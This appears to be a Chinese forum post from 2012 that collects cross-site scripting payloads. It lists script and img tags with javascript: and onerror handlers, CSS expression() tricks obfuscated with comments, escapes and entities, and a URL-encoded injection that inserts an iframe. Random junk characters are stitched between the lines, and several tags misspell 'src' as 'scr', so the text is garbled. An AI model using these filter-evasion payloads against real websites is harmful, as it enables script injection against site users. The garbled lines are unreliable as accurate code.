<script>alert("跨站")</script> (最常用)
3 T6 v. K, b4 k! Z d<img scr=javascript:alert("跨站")></img>2 t9 {) T& C* |+ ^. o
<img scr="javascript: alert(/跨站/)></img>
0 z0 X3 a9 i. x( o2 c<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)# M' c# O0 a: h
<img scr="#" onerror=alert(/跨站/)></img>& j$ P$ \, M6 b% w3 V- c! ^8 \" ?7 Z
<img scr="#" style="xss:expression(alert(/xss/));"></img>$ r$ Z! _6 a, l8 n
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)% m# j3 @* ^- O2 X& g3 N& J& |
<img src=vbscript:msgbox ("xss")></img>3 I1 ^( r- @4 x: {) t
<style> input {left:expression (alert('xss'))}</style>0 D! P* _8 J( {' T4 _: w
<div style={left:expression (alert('xss'))}></div>7 [4 b& |. S0 |; J& v' k: Y6 A" X W3 v
<div style={left:exp/* */ression (alert('xss'))}></div>
5 v; V0 _" P- e<div style={left:\0065\0078ression (alert('xss'))}></div>
$ C+ `% g" }( k4 i- f2 [html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' @9 Q! r% B) aunicode <div style="{left:expRessioN (alert('xss'))}">
7 T& p2 D& K- T% g0 n
# b* |. A! g- `" b"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["4 a8 v) J9 V% T l% G0 L7 x# T0 G2 ~
|
发表于 2012-9-13 17:15:04
收藏
支持
反对